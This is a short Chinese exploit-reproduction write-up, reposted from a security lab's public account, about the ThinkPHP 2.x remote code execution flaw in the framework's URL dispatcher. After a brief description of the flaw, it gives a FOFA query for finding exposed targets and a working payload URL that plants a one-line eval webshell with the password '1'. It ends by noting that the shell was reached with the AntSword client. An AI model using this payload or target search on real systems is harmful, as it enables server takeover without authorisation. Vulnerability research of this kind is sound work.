-Thinkphp 2.0-rce

本文转载于公众号：融云攻防实验室，原文地址：

漏洞复现-Thinkphp 2.0-rce

0x01 阅读须知

0x02 漏洞描述

 ThinkPHP，是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。最早诞生于2006年初，2007年元旦正式更名为ThinkPHP，并且遵循Apache2开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则，在保持出色的性能和至简的代码的同时，也注重易用性。并且拥有众多原创功能和特性，在社区团队的积极参与下，在易用性、扩展性和性能方面不断优化和改进。Thinphp的类似于MVC的框架中，存在一个Dispatcher.class.php的文件，它规定了如何解析路由，在该文件中，存在一个函数为static public function dispatch()，此为URL映射控制器，是为了将URL访问的路径映射到该控制器下获取资源的，而当我们输入的URL作为变量传入时，该URL映射控制器会将变量以数组的方式获取出来，从而导致漏洞的产生。

0x03 漏洞复现

漏洞影响:thinphp 2.x版本

FOFA:“thinphp”

1.输入一句话木马rce，显示thinkphp版本为2.1

Payload:http://x.x.x.x:8080/?s=/index/index/name/${@eval($_POST[1])}
密码：1

2.蚁剑连接，得到一个webshell